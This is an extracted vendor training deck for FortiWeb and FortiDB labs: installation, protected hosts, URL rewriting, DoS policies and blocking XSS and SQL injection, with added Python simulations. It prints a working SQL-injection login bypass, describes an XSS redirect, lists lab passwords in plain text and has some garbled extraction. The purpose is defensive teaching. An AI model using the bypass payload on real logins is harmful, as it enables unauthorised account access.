Windows: %WINDIR%\System32\drivers\etc\hosts

Linux/Mac: /etc/hosts

2. Ping www.xbank.com. Does it work?

3. Access www.xbank.com using your browser. Does it work? Why? (The browser now sends Host: www.xbank.com, which is not yet in the protected server list, so the default action Deny applies.)

4. Add a new entry in your protected server to accept requests to www.xbank.com
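The protected-server note (slide 79) and the FQDN lab above both come down to one rule: the Host header of each request is matched against the protected host list, and anything unmatched gets the default action. The following added example is a small simulation of that check, not FortiWeb code; the request parser, the policy table and the idea that the first entry created in the lab was the virtual IP are assumptions, and the addresses and host name are the lab's values reused.

```python
# Constructed simulation of a WAF "protected hosts" check (not FortiWeb code).
VIRTUAL_IP = "2.2.2.50"
PHYSICAL_SERVER = "2.2.2.21"


def parse_request(raw):
    """Minimal HTTP/1.x request-line and header parser (body ignored)."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, version = lines[0].split(" ")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, target, headers


def policy_decision(raw, protected_hosts, default_allow=False):
    """Returns ("forward", backend) or ("deny", reason).
    Matching is on the Host header only, as in the Protected Servers object;
    default_allow=False is the slide's 'Default Action = Deny'. Host is
    compared case-insensitively and without the optional :port suffix."""
    _method, _target, headers = parse_request(raw)
    host = headers.get("host", "").split(":", 1)[0].strip().lower()
    if host in {h.lower() for h in protected_hosts}:
        return ("forward", PHYSICAL_SERVER)
    if default_allow:
        return ("forward", PHYSICAL_SERVER)
    return ("deny", "Host not in protected hosts: " + (host or "<missing>"))


def lab_scenarios():
    """The requests a browser sends in slides 87 to 89, before and after the
    www.xbank.com entry is added."""
    by_name = "GET /xbank/index.html HTTP/1.1\r\nHost: www.xbank.com\r\n\r\n"
    by_ip = "GET /xbank/index.html HTTP/1.1\r\nHost: " + VIRTUAL_IP + "\r\n\r\n"
    by_port = "GET /xbank/index.html HTTP/1.1\r\nHost: WWW.XBANK.COM:80\r\n\r\n"
    no_host = "GET /xbank/index.html HTTP/1.0\r\n\r\n"
    before = {VIRTUAL_IP}                      # assumption: first entry = the VIP
    after = {VIRTUAL_IP, "www.xbank.com"}      # slide 89, step 4
    return {
        "ip_before": policy_decision(by_ip, before),
        "name_before": policy_decision(by_name, before),
        "name_after": policy_decision(by_name, after),
        "name_port_after": policy_decision(by_port, after),
        "no_host": policy_decision(no_host, after),
        "ip_default_allow": policy_decision(by_ip, set(), default_allow=True),
    }


if __name__ == "__main__":
    for name, decision in lab_scenarios().items():
        print(f"{name:18} {decision}")
```

The last scenario is why the slides insist on Default Action = Deny: with the default set to allow, a request with an unknown or missing Host header is forwarded with whatever profile the policy applies, and in a multi-homed setup that may be the wrong site's profile or none at all.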

    Final Results

  • 7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1

    90/362

    FortiDB Installation (1)

    Log in to your virtual machine with an administrator account

    Execute the FortiDB installer and follow the on-screen instructions

    FortiDB Installation (2)

    FortiDB Installation (3)

    Select installation path or leave default: C:\FortiDB

    FortiDB Installation (4)

    Select the FortiDB internal repository. Use Derby in this case

    FortiDB Installation (5)

    Leave the communication ports at their default values

    FortiDB Installation (6)

    FortiDB Installation (7)

    FortiDB Installation (8)

    FortiDB Installation (9)

    FortiDB Installation (10)

    Verify the installation by logging in to FortiDB:

    URL: http://2.2.2.20:9100/

    UID: admin

    PWD: fortidb1!$

    FortiDB Initial Setup

    FortiDB Initial Setup LAB

    admin

    fortidb1!$

    Monitoring xbankapp_db

    1. Navigate to Targets

    2. Click Add to specify a new DB Target

    Monitoring xbankapp_db (2)

    1. Fill the required information according to the values in the figure

    2. Complete credentials (sa/fortidb1!$)

    3. Save

    4. Test Connection

    5. Validate test result

    Monitoring xbankapp_db (3)

    1. Navigate to Monitoring Management

    2. Click on the database target

    Monitoring xbankapp_db (4)

    1. Select Collection Method

    2. Specify Trace Folder location

    Path to Trace Folder: C:\Program Files\Microsoft SQL Server\MSSQL10.XTREME_DB\MSSQL\Log

    3. Test

    4. Validate Test Result

    5. Save

    Monitoring xbankapp_db (5)

    1. Go to Alert Policy Groups (double click)

    2. Select Monitoring Policy Groups

    3. Save

    Monitoring xbankapp_db (6)

    1. Go to the Alert Policies tab (double click)

    2. Click the check box to enable all policies

    3. Click Enable to save

    Monitoring xbankapp_db (7)

    1. Navigate to General Tab

    2. Select Start monitoring when FortiDB starts and click the Start Monitoring button

    3. Save

    Monitoring check

    1. Navigate back to Monitoring Management

    3. You should end up with a green monitoring status indicator

    Introduction to FortiWeb

    What is Application Security ?

    Application life-cycle focus (mitigating control): Design, Development, Deployment, Upgrade, Maintenance

    Ideal, but too late

    Difficult

    Lengthy

    Expensive

    Legacy apps?

    Who has responsibility? Proprietary software, off-the-shelf, cloud offering

    Application controls focus (compensating control):

    Mitigation of threats (technical / functional)

    Web application security policy

    Application Security Needs New Approach

    Network Firewall / IPS/Deep Packet Inspection Firewalls / FortiWeb Web Application Firewall

    Network firewalls detect network attacks: they inspect IP and port

    IPS products detect known signatures only:

    Signature evasion is possible

    No protection of SSL traffic

    No real HTTP understanding (headers, parameters, etc.)

    No application awareness

    No user awareness

    High rate of false positives

    Only Web Application Firewalls can detect and block application attacks!

    Network layer (OSI 1-3)

    Application layer (OSI 4-7)

    Introducing - FortiWeb Web Application Firewall

    Web Application Firewall (WAF): secures web applications to help customers meet compliance requirements

    Web Vulnerability Scanner: scans, analyzes and detects web application vulnerabilities

    Application Delivery: assures availability and accelerates performance of critical web applications

    Figure labels: Secures Web Applications, Scans and Detects Web Vulnerabilities, Optimizes Application Delivery, WAF

    FortiGuard Subscription Services

    100+ threat research professionals

    Eight global locations

    Automated updates to Fortinet customers

    FortiWeb Security Service subscription keeps your FortiWeb automatically up to date with:

    Hundreds of application signatures

    Updates with new application signatures, malicious robots, suspicious URL patterns and web vulnerability scanner patterns

    FortiWeb Antivirus Service subscription: automated content updates for file upload scanning

    Robust 24 x 7 x 365 Real-Time Global Intelligence

    Real-Time Security Protection, Global Distributed Network

    FortiWeb Flexible Deployment Options

    Layer II - Transparent Inspection and True Transparent Proxy

    Easy deployment - no need to re-architect the network, full transparency

    Fail Open Interface

    Reverse Proxy

    Supports content modification for both requests and replies from the server

    Advanced URL rewriting capabilities

    HTTPS offloading

    Enhanced load balancing schemes

    Non Inline Deployment (SPAN port)

    Zero network latency

    Blocking capabilities using TCP resets

    Ideal for initial product evaluations, non-intrusive network deployment

    Figure labels: Web Application Servers, FortiWeb

    High Availability

    Active / Passive failover

    Full configuration synchronization

    Seamless fail-over

    No down time

    Configuration Sync

    Sync FortiWeb devices across networks

    Allows managing policies across multiple devices from a central location

    Seamless integration into already existing HA/LB environments

    Figure labels: Server Farm, FortiWeb, Disaster Recovery

    FortiWeb Product Family

    FortiWeb-400C

    Mid-Enterprise Deployments

    100 Mbps HTTP throughput

    10,000 transactions per second

    FortiWeb-1000C

    Large Enterprise Deployments

    ASIC based Acceleration - FortiModule-CP7

    500 Mbps HTTP throughput

    27,000 transactions per second

    FortiWeb-3000C/3000CFsx

    Large Enterprise / Service Provider Deployments

    ASIC based Acceleration - FortiModule-CP7

    1 Gbps HTTP throughput

    40,000 transactions per second

    Hot-swap redundant AC power, 2 x 1 TB storage

    6 x 10/100/1000 copper (+ 2 x Gbps SFP for 3000CFsx)

    FortiWeb-4000C

    Large Enterprise / Service Provider Deployments

    ASIC based Acceleration - FortiModule-CP7

    Hardware based DLP acceleration

    2 Gbps HTTP throughput

    70,000 transactions per second

    Hot-swap redundant AC power, 2 x 1 TB storage

    6 x 10/100/1000 copper, 2 x Gbps SFP interfaces

    FortiWeb-VM

    Figure labels: Desktops / Private, Servers / DMZ, FortiWeb Virtual Appliance, Virtualized Data Center, Public Zone / DMZ

    Deploy FortiWeb in a virtualized environment

    Mitigates blind spots

    Protects web applications regardless of connection origin

    Provides visibility to internal connections as well

    Same functionality as appliance

    Requirement: Min needed for FortiWeb-VM

    Licenses: 2-vCPU, 4-vCPU, 8-vCPU

    Hypervisor: VMware ESXi/ESX 3.5/4.0/4.1/5.0

    Memory: Min. 1024

    CPU: Min. 2 virtual CPUs

    10/100/1000 Interfaces: Min. 2, Max. 4 virtual NICs

    Storage Capacity: Min. 40G

    Real Time Dashboard

    FortiWeb provides a real time dashboard:

    Traffic monitor per application

    Attack Event history per application

    Latest Alerts

    Appliance state

    Data Analytics Geo IP Analysis & Security

    Analyses web app usage based on geographic location and server access

    Dissects traffic based on Hit, Data and Attack type

    Easily block access from a country using right click, Map view or List view

    Provides a graphical interface that helps organizations understand application trends both from a user and a server perspective

    FortiAnalyzer Integration

    Centralized logging, reporting and analysis for multiple FortiWeb devices

    * Starting from FortiAnalyzer MR3

    Acceleration

    Integrated ASIC based hardware SSL offloading: offload CPU intensive SSL computing from the server to FortiWeb

    Hardware-based key exchange and bulk encryption

    Purpose built SSL processing

    Full certificate management

    Advanced certificate verification and revocation capabilities

    TCP Connection Multiplexing

    Data Compression

    Compress poorly optimised content to minimise impact on network resources and reduce application delivery latency

    Allows efficient bandwidth utilization and response time to users by compressing data retrieved from servers

    Compresses files using gzip

    Compression rate depends on data type and character redundancy

    Load Balancing

    Intelligent, application aware layer 7 load balancing

    Support for HTTP/HTTPS only

    Variety of Load Balancing algorithms: Round Robin, Weighted Round Robin, Least Connection, HTTP Session Based Round Robin

    Connection persistence: persistence timeout value

    Flexible health checks: Physical Server monitoring via HTTPS, HTTP, TCP, Ping; content based health checks with regex support

    Web Services balancing: WSDL or Content routing statements

    Advanced Rewriting Capabilities

    Content Routing - route traffic based on: IP, Host, URL

    Rewriting and Redirection capabilities: Host, URL, Referrers

    Rewrite reply content: absolute links, any required content, multiple content types supported

    Web Application Scanner

    Easily scan your applications for web vulnerabilities

    Common vulnerabilities: SQL Injection, Cross Site Scripting, Source code disclosure, OS Commanding

    Enhanced/Basic Mode

    Authentication options

    Granular crawling capabilities

    Scheduled and on demand scanning

    Web Application Scanner

    Vulnerability Reports:

    Scan summary

    Vulnerability by severity

    Vulnerability by categories

    Application Vulnerabilities

    Common Vulnerabilities

    Server Information

    Crawling information

    URLs accepting input

    External Links

    Email reports automatically

    Updates via FortiGuard

    Complements WAF for PCI DSS 6.6

    FortiWeb Auto Learn

    Understands Application Structure

    Models elements from actual traffic

    Builds baseline based on URLs, parameters, HTTP methods

    Automatically Understands Real Behavior:

    Can form fields/parameters be modified by users?

    What are the length and type of each form field?

    What characters are acceptable (min, max, average)?

    Is a form field required or optional?

    Provides recommendations and graphs

    What about those web app dedicated DDoS attacks?

    Application based DDoS is on the increase, accounting for a quarter of all DDoS attacks

    Under the radar's bandwidth threshold

    Targeting specific web app/protocol flaws rather than bandwidth consumption:

    CPU intensive SQL queries to backend DB

    Writing to hard disks

    Server specific

    Slow based and legitimate request attacks:

    Slowloris - sends legitimate, but partial, never ending requests

    Using tools that can be easily downloaded from the internet such as HOIC and LOIC

    Using botnets and automatic tools to reach mass

    Sometimes camouflaging real data breach attempts: SQL Injection primarily

    Figure labels: Zombie Botnet, Many become one

    FortiWeb DoS/DDoS Protection - Application and Network Based

    Analyzes requests originating from different users based on different characteristics such as IP and cookie

    Sophisticated mechanism understands whether these are real users or automated attacks (HOIC, LOIC tools)

    Application layer: 4 different policies

    HTTP Access Limit - Limits the amount of HTTP requests per second from a certain IP

    Malicious IPs - Limits the number of TCP connections with the same session cookie

    HTTP Flood Prevention - Limits the number of HTTP requests per second with the same session cookie

    Real Browser Enforcement - Sets the number of HTTP requests per TCP connection, per second, to a specific URL before FortiWeb issues a script to the client to validate whether this is a real browser or an automated tool

    Network layer: 2 different policies

    TCP Flood Prevention - Limits the number of TCP connections from the same source IP address

    SYN Cookie - Protects against SYN flood attacks
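    The IP-keyed and cookie-keyed policies above can be checked offline against request records. The following is an added example (not FortiWeb code) that evaluates HTTP Access Limit and HTTP Flood Prevention over constructed request lines; the log format, thresholds and addresses are assumptions made for this illustration.

```python
from collections import defaultdict
from typing import Dict, List, NamedTuple, Set

# Added example, not FortiWeb's own code. It replays constructed request records
# and evaluates two of the application-layer DoS policies described above, each
# keyed the way the slide describes it:
#   HTTP Access Limit     - requests per second from one source IP
#   HTTP Flood Prevention - requests per second carrying the same session cookie
# The log format, thresholds and addresses are constructed for this example.


class Request(NamedTuple):
    ts: float       # seconds since an arbitrary epoch
    src_ip: str
    cookie: str     # session cookie value, "" when the request carried none
    url: str


def parse_log(lines: List[str]) -> List[Request]:
    """Parse constructed lines of the form '<ts> <src_ip> <cookie|-> <url>'."""
    records = []
    for line in lines:
        ts, ip, cookie, url = line.split()
        records.append(Request(float(ts), ip, "" if cookie == "-" else cookie, url))
    return records


def exceeds_rate(times: List[float], limit: int, window: float = 1.0) -> bool:
    """True if more than `limit` timestamps fall inside any sliding window of `window` seconds."""
    times = sorted(times)
    start = 0
    for end in range(len(times)):
        while times[end] - times[start] >= window:
            start += 1
        if end - start + 1 > limit:
            return True
    return False


def evaluate(reqs: List[Request], access_limit: int, flood_limit: int) -> Dict[str, Set[str]]:
    """Return the source IPs and session cookies that would trip each policy."""
    by_ip: Dict[str, List[float]] = defaultdict(list)
    by_cookie: Dict[str, List[float]] = defaultdict(list)
    for r in reqs:
        by_ip[r.src_ip].append(r.ts)
        if r.cookie:
            by_cookie[r.cookie].append(r.ts)
    return {
        "http_access_limit": {ip for ip, t in by_ip.items() if exceeds_rate(t, access_limit)},
        "http_flood_prevention": {c for c, t in by_cookie.items() if exceeds_rate(t, flood_limit)},
    }


# Constructed sample: one source hammers the login page without a cookie, one
# session cookie is replayed from three addresses (each address alone stays
# under the per-IP limit), and one ordinary user browses slowly.
SAMPLE_LOG = [
    "100.00 10.0.0.5 - /index.php?p=login.html",
    "100.10 10.0.0.5 - /index.php?p=login.html",
    "100.20 10.0.0.5 - /index.php?p=login.html",
    "100.30 10.0.0.5 - /index.php?p=login.html",
    "100.40 10.0.0.5 - /index.php?p=login.html",
    "100.50 10.0.0.5 - /index.php?p=login.html",
    "101.00 10.0.1.1 sess-AAA /verify_admin.php",
    "101.10 10.0.1.2 sess-AAA /verify_admin.php",
    "101.20 10.0.1.3 sess-AAA /verify_admin.php",
    "101.30 10.0.1.1 sess-AAA /verify_admin.php",
    "101.40 10.0.1.2 sess-AAA /verify_admin.php",
    "105.00 10.0.0.9 sess-BBB /index.php?p=login.html",
    "108.00 10.0.0.9 sess-BBB /account.html",
]


def demo() -> Dict[str, Set[str]]:
    """Evaluate the sample with an assumed limit of 5 req/s per IP and 4 req/s per cookie."""
    return evaluate(parse_log(SAMPLE_LOG), access_limit=5, flood_limit=4)


if __name__ == "__main__":
    for policy, offenders in demo().items():
        print(policy, sorted(offenders))
```

    Only the cookie-keyed policy catches the replayed session, since no single address in that group exceeds the per-IP limit; that is the distinction the two policies exist for.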

    Antivirus File Scanning and File Upload Restriction

    Scan file uploads using Fortinet's Antivirus engine

    Regular and extended virus database

    Updates via FortiGuard with the Antivirus service

    Restricts file type uploads

    Data Leak Prevention

    FortiWeb monitors all outgoing traffic and protects against:

    Information Disclosure

    Credit Card theft/misuse

    Web Site Anti-Defacement WAF

    Monitors application files at specified time intervals

    Upon file change detection: FortiWeb Alert, Automatically restore

    FortiWeb provides protection at all layers

    Advanced Protection: Custom Security Policies - custom policies to match on multiple elements: URL, Source IP, Header type and value, Thresholds

    Antivirus file upload scanning and Data Leak Prevention - scans uploaded files for viruses and malware (FortiGuard updates); detects Information Disclosure, credit card and PII leakage

    Auto Learn and Validation Rules - deviations from normal user behavior, automated and customer rules

    Application Attack Signatures - detects known application attacks; FortiGuard updates

    Protocol Validation - validates HTTP RFC compliance

    Application and Network Denial of Service Protection (DoS/DDoS protection) - detects and aggregates DoS attacks from multiple vectors

    Event/Attack/Traffic Alerts

    Attack Alerts: full HTTP request

    Traffic Alerts: any access to web applications

    Event Alerts: any action on the FortiWeb device

    Reports - Attacks

    Out of the box rich and graphical reports

    Custom reports

    Scheduled daily, weekly, monthly or on demand

    PDF, HTML, Word, TXT, MHT formats

    Reports Traffic and Events

    Report on any access to the application: Application Hits, Service type usage (HTTP/HTTPS), Top sources

    Report on any access or change to the FortiWeb device

    FortiWeb Value Add

    Figure labels: FortiClient Desktop, Application Security, Application Delivery, Vulnerability Assessment, Authentication, Load Balancing and Acceleration, HTTP Compliance, Application Signatures, Auto Learn, Data Leak Prevention, Compression

    Dramatically reduce the risk of corporate data loss

    Accurate protection with multiple layers of defense:

    Integrated Web Vulnerability Scanner

    Protects against the OWASP Top 10

    Automated management using Auto Learn Baselining

    Easily deploys in any environment: multiple deployment options

    Accelerates applications: application aware Load Balancing, Compression, ASIC based SSL Acceleration

    Helps achieve PCI compliance

    Hands On

    How to PoC FortiWeb

    Web Protection Profiles

    Web Protection Profiles:

    Define what to inspect and how to do it.

    Are made of different rules, constraints and settings

    Are similar to Protection Profiles in the FortiGate configuration

    Creating a new Web Protection Profile

    1. Select: Web Protection Profiles > Inline Protection Profile

    2. Click Create New

    Creating a new Web Protection Profile (2)

    1. Name the Web Protection Profile: xbank_web_protection

    2. Leave other fields as default

    3. Click OK to save

    4. Edit the xbank_web_policy and assign the newly created profile

    5. Test accessing the XBANK application

    FortiWeb URL Rewriting

    FortiWeb URL Rewriting - Discussion

    URL Rewriting

    Without URL rewriting, when accessing the XBANK application the end user(s) are required to specify /xbank/ in the URL path, due to the existing directory structure.

    The URL Rewriting feature removes this requirement.

    Added Benefit: transparently hides the internal directory structure from end user(s)

    URL entered by end user(s) changes

    From:

    To:

    URL Rewriting > Creating Rewriting Rules

    1. Create a New URL Rewriting Rule

    2. Click Create New

    URL Rewriting > Creating Rewriting Rules (2)

    1. Unique Rule Name

    2. What to rewrite

    3. Where to rewrite

    4. Click OK to save

    5. Click Create New to define RegEx

    URL Rewriting > Define Regular Expression Match

    1. Select which object to match

    2. Define the Pattern Match

    3. Select the condition of the match

    A Note on Regular Expressions

    Matching URL Paths to a regex provides a concise and flexible means for matching strings of text.

    Meta-character  Description

    .               Matches any single character

    [ ]             Matches a single character contained within the brackets

    ^               Matches the starting position within the string

    $               Matches the ending position within the string

    *               Matches the preceding element zero or more times

    ?               Matches the preceding element zero or one time

    |               Choice operator: matches either the expression before or the expression after the operator

    ( )             Memory: expressions between parentheses remain in a memory position

    URL Rewriting > Creating Rewriting Rules (3)

    Specify the new URL path to be used to connect to the defined physical server

    NOTE: $0 = the first RegEx parameter matched (everything inside the first set of parentheses)

    URL Rewriting > Create a new Rewrite Policy

    1. Create a new URL Rewriting Policy

    2. Click Create New

    URL Rewriting > Create a new Rewrite Policy (2)

    3. Unique Policy Name

    4. Click OK to Save

    5. Click Create New to select and prioritize Rewrite Rule(s)

    URL Rewriting > Set Rewrite Rule Priority

    1. Set Rule Priority

    2. Select Rewrite Rule

    3. Click OK to Save

    NOTES: Priorities determine the execution order of the rewriting rules (the lowest priority value executes first)

    Lower priority values are executed before higher priority values
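    An added example (not FortiWeb's own code) that models the rewriting rules, the $0/$1 group references and the priority order described on the slides above. The rule names and patterns are constructed for the lab, and the assumption that every matching rule is applied in priority order is mine; check it against the product before relying on it.

```python
import re
from typing import List, Optional, Tuple

# Added example, not FortiWeb's own code. It models the URL rewriting rules and
# priorities described above: each rule carries a priority (lower values run
# first), a regular expression matched against the request path, and a new
# path in which $0 stands for the first parenthesised group, $1 for the second,
# and so on. Rule names, patterns and the chaining of every matching rule in
# priority order are assumptions made for this example.


class RewriteRule:
    def __init__(self, name: str, priority: int, pattern: str, new_path: str):
        self.name = name
        self.priority = priority
        self.pattern = re.compile(pattern)
        self.new_path = new_path

    def apply(self, path: str) -> Optional[str]:
        """Return the rewritten path, or None when the pattern does not match."""
        m = self.pattern.match(path)
        if m is None:
            return None

        def group_ref(ref):
            # $N on the slide is 0-based; Python capture groups are 1-based.
            idx = int(ref.group(1)) + 1
            if idx > len(m.groups()) or m.group(idx) is None:
                return ""
            return m.group(idx)

        return re.sub(r"\$(\d+)", group_ref, self.new_path)


class RewritePolicy:
    def __init__(self, rules: List[RewriteRule]):
        # "Lower priority values are executed before higher priority values."
        self.rules = sorted(rules, key=lambda r: r.priority)

    def rewrite(self, path: str) -> Tuple[str, List[str]]:
        """Apply every matching rule in priority order; return (path, names of rules that fired)."""
        fired: List[str] = []
        for rule in self.rules:
            rewritten = rule.apply(path)
            if rewritten is not None:
                fired.append(rule.name)
                path = rewritten
        return path, fired


def xbank_policy() -> RewritePolicy:
    """Constructed policy for the lab: hide the /xbank/ directory from end users."""
    return RewritePolicy([
        # Empty path -> the login page (uses ? from the meta-character table).
        RewriteRule("default_page", priority=1, pattern=r"^/?$", new_path="/login.html"),
        # Two groups and the | choice operator: $0 is the directory, $1 the file.
        RewriteRule("static_assets", priority=5, pattern=r"^/(images|css)/(.*)$",
                    new_path="/static/$0/$1"),
        # Prepend /xbank/ to everything that does not already carry it; the
        # negative lookahead stops the rule from stacking the prefix twice.
        RewriteRule("xbank_prefix", priority=10, pattern=r"^/(?!xbank/)(.*)$",
                    new_path="/xbank/$0"),
    ])


if __name__ == "__main__":
    policy = xbank_policy()
    for p in ["/", "/index.php", "/images/logo.png", "/xbank/index.php"]:
        print(p, "->", policy.rewrite(p))
```

    Note that a bare ^/(.*)$ rule would also rewrite a request that already names /xbank/, so the guard in the last rule is the kind of check worth keeping when the pattern is this broad.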

    URL Rewriting > Set Rewrite Rule Priority

    Final Results

    URL Rewriting > Associate Rewrite Policy to Protection Profile

    1. Navigate to Web Protection Profile

    2. Edit Protection Profile

    3. Select rewrite policy and click OK to save

    URL Rewriting > Associate Protection Profile to Server Policy

    1. Navigate to Server Policy

    2. Edit Server Policy

    3. Select Web Protection Profile

    URL Rewriting Test Configuration

    After creating the URL Rewriting Policy, assigning it to the Web Protection Profile xbank_web_protection and applying the Web Protection Profile to the Server Policy xbank_web_policy:

    Test the rewrite by entering www.xbank.com into your browser

    Preventing Information Disclosure

    Preventing Information Disclosure

    Discussion and Lab

    Information Disclosure

    1. Usually one of the first steps taken by malicious users that will attack a system is gathering information about it: operating system, versions, application types, etc.

    2. This gathering process is known as fingerprinting

    3. The Server Protection rule Information Disclosure helps prevent the disclosure of this type of information.

    Prevent Information Disclosure

    1. Point your browser to http://www.xbank.com/xxx.html

    2. What did you get as response? Any problem with it?

    3. Sometimes applications give too much information when showing an error.

    Prevent Information Disclosure - Configuration

    1. Navigate to Server Protection

    2. Create a New Policy

    Prevent Information Disclosure - Configuration (2)

    1. Name the Server Protection Policy: Server_Protection-xbank

    2. Enable only the Information Disclosure rule

    3. Select the Action of Alert & Erase

    4. Click OK to save

    Prevent Information Disclosure - Configuration (3)

    1. Select New Policy

    Edit the xbank_web_protection profile and assign the newly created rule

    Test by accessing http://www.xbank.com/xxx.html

    Prevent Information Disclosure - Check Attack Log

    Cross Site Scripting (XSS)

    Preventing Cross Site Scripting (XSS) - Discussion and Lab

    Cross Site Scripting (XSS)

    This is a type of attack in which malicious scripts are injected into trusted sites.

    Most of the time the reason a site is vulnerable to this type of attack is that it does not do appropriate parameter validation

    Can be used to steal credentials, user and cookie information

    It exploits the fact that the user trusts the site

    Cross Site Scripting (XSS) - An example (index.php)

    Index.php is a frameset that contains three frames:

    - Top: topFrame.html

    - Bottom: bottomFrame.html

    - Main: gets its content from the p parameter value. By default, parameter p is fed content from login.html

    Cross Site Scripting (XSS) - An example (index.php)

    Look what happens if you change the value of parameter p to another value

    You don't need to guess what happens when a malicious site is used instead of www.google.com

    This is just a simple example of XSS!

    Prevent XSS - Parameter Validation > Create Rule

    1. Navigate to Parameter Validation Rule

    2. Click Create New

    Prevent XSS - Parameter Validation > Create Rule (2)

    1. Name the Rule: index.php

    2. Select Host Status

    3. Select Host Name

    4. Define the Request URL

    5. Select the Action: Alert & Deny

    6. Select the Severity: High

    7. Click OK to save

    8. Click Create New to define rule match criteria

    Prevent XSS - Parameter Validation > Create Rule (3)

    1. Parameter Name: p

    2. Max Length set to the default value of 0

    3. Select Required

    4. Select Use Type Check

    5. Select Argument Type = Regular Expression

    6. Regular Expression = ^login.html$

    7. Click OK to save

    Rule match: parameter p = login.html

    Prevent XSS - Parameter Validation > Create Policy

    1. Navigate to Parameter Validation Policy

    2. Click Create New

    Prevent XSS - Parameter Validation > Apply Policy

    1. Apply the Parameter Validation Policy Parameter_Validation_Policy1 to the Inline Protection Profile xbank_web_protection

    2. Click OK to save

    Prevent XSS - Parameter Validation > Check Attack Log

    Navigate to Log & Report > Log Access > Attack and search for the XSS attack you just completed

    Prevent SQL Injection

    Prevent SQL Injection

    Discussion

    SQL Injection - An overview of SQL

    SQL (Structured Query Language): language for managing data in DBMS (Database Management Systems). Commands are grouped in four sets:

    1. Data Manipulation Language (DML): SELECT, UPDATE, INSERT, DELETE

    2. Data Definition Language (DDL): CREATE, ALTER, DROP

    3. Data Control Language (DCL): GRANT, REVOKE

    4. Transaction Control Language (TCL): COMMIT, ROLLBACK

    A SQL Injection attack is about modifying SQL sentences by inserting special strings in application fields, URLs, hidden fields, etc.

    SQL Injection - An overview of SQL DML (2)

    Inserting a record in a database (basic):

    XBANK_CUSTOMER table columns: customer_id, customer_login, customer_password, customer_fname, customer_lname, customer_email, customer_address, customer_since

    INSERT INTO Table1 (
        Field1,
        Field2,
        ...
    )
    VALUES (
        Value1,
        Value2,
        ...
    )

    INSERT INTO xbank_customer (
        customer_login,
        customer_password,
        customer_fname,
        customer_lname)
    VALUES (
        'mylogin',
        'abc1234',
        'John',
        'Anderson')

    SQL Injection - An overview of SQL DML (3)

    Updating a record in a database (basic):

    UPDATE Table1 SET
        Field1 = Value1,
        Field2 = Value2,
        ...
    WHERE
        Condition1 [and|or]
        Condition2

    XBANK_CUSTOMER table columns: customer_id, customer_login, customer_password, customer_fname, customer_lname, customer_email, customer_address, customer_since

    UPDATE xbank_customer SET
        customer_login = 'mylogin',
        customer_password = 'abc1234',
        customer_fname = 'John',
        customer_lname = 'Anderson'
    WHERE
        customer_id = 1

    SQL Injection - An overview of SQL DML (4)

    Deleting a record from the database (basic):

    DELETE FROM Table1
    WHERE
        Condition1 [and|or]
        Condition2

    XBANK_CUSTOMER table columns: customer_id, customer_login, customer_password, customer_fname, customer_lname, customer_email, customer_address, customer_since

    DELETE FROM xbank_customer
    WHERE
        customer_email LIKE '%@company.com' or
        customer_login = 'mylogin'

    SQL Injection - CHALLENGE: Login to the application

    Try to login to the application without using any valid user

    or password.TIP: Youll have to inject some SQL

    By injecting some SQL you can change the conditional part of the

    SQL Injection - CHALLENGE: Login to the application (2)

  • 7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1

    186/362

    y j g y g pquery so its always true Login: whatever you want Password: mypassword' or 'a'='a

    Take a look at the query executed by the application:select

    customer_id

    fromxbank_customer

    wherecustomer_login = whatever you want and

    customer_password = mypassword or a=a ;

    The part that is after the oris always true: a is always equal to a
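To see the always-true condition at work next to the application-side fix, here is an added Python example (not code from the training deck) that runs the slides' UPDATE, DELETE and login SELECT against an in-memory SQLite copy of xbank_customer. The sample rows, the make_db/login_unsafe/login_safe/update_customer/delete_customers names and the string-concatenation login are constructed for this illustration; the bound-parameter versions show the fix that a WAF signature complements rather than replaces.

```python
import sqlite3

# Constructed sample schema and rows, modelled on the XBANK_CUSTOMER table from the slides.
SCHEMA = """
CREATE TABLE xbank_customer (
    customer_id       INTEGER PRIMARY KEY,
    customer_login    TEXT NOT NULL,
    customer_password TEXT NOT NULL,
    customer_fname    TEXT,
    customer_lname    TEXT,
    customer_email    TEXT,
    customer_address  TEXT,
    customer_since    TEXT
);
"""

SAMPLE_ROWS = [
    (1, "jsmith", "s3cret!", "John", "Smith", "jsmith@company.com", "1 Main St", "2010-01-01"),
    (2, "mlopez", "pa55word", "Maria", "Lopez", "mlopez@example.org", "9 High St", "2011-03-15"),
]


def make_db():
    """Fresh in-memory database loaded with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO xbank_customer VALUES (?, ?, ?, ?, ?, ?, ?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def build_login_query_unsafe(login, password):
    """The pattern from the slides: user input concatenated straight into the SQL text."""
    return ("select customer_id from xbank_customer where customer_login = '"
            + login + "' and customer_password = '" + password + "'")


def login_unsafe(conn, login, password):
    """customer_ids matched by the concatenated query; the injected OR matches every row."""
    rows = conn.execute(build_login_query_unsafe(login, password)).fetchall()
    return sorted(r[0] for r in rows)


def login_safe(conn, login, password):
    """Same lookup with bound parameters: the quote in the password is data, not SQL."""
    rows = conn.execute(
        "select customer_id from xbank_customer "
        "where customer_login = ? and customer_password = ?",
        (login, password),
    ).fetchall()
    return sorted(r[0] for r in rows)


def update_customer(conn, customer_id, login, password, fname, lname):
    """Parameterised form of the UPDATE on the slides; returns the number of rows affected."""
    cur = conn.execute(
        "UPDATE xbank_customer SET customer_login = ?, customer_password = ?, "
        "customer_fname = ?, customer_lname = ? WHERE customer_id = ?",
        (login, password, fname, lname, customer_id),
    )
    conn.commit()
    return cur.rowcount


def delete_customers(conn, email_pattern, login):
    """Parameterised form of the DELETE on the slides; returns the number of rows affected."""
    cur = conn.execute(
        "DELETE FROM xbank_customer WHERE customer_email LIKE ? OR customer_login = ?",
        (email_pattern, login),
    )
    conn.commit()
    return cur.rowcount


if __name__ == "__main__":
    db = make_db()
    payload = "mypassword' or 'a'='a"
    print("concatenated query matches:", login_unsafe(db, "whatever you want", payload))
    print("parameterised query matches:", login_safe(db, "whatever you want", payload))
```

With the injected password the concatenated query returns every customer_id, while the parameterised query returns nothing, because SQLite never sees the quote as a delimiter.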


    Prevent SQL Injection Server Protection > Test Policy

    1. Navigate to http://www.xbank.com/index.php?p=login.html and attempt a new SQL injection: Login with password = mypassword' or 'a'='a
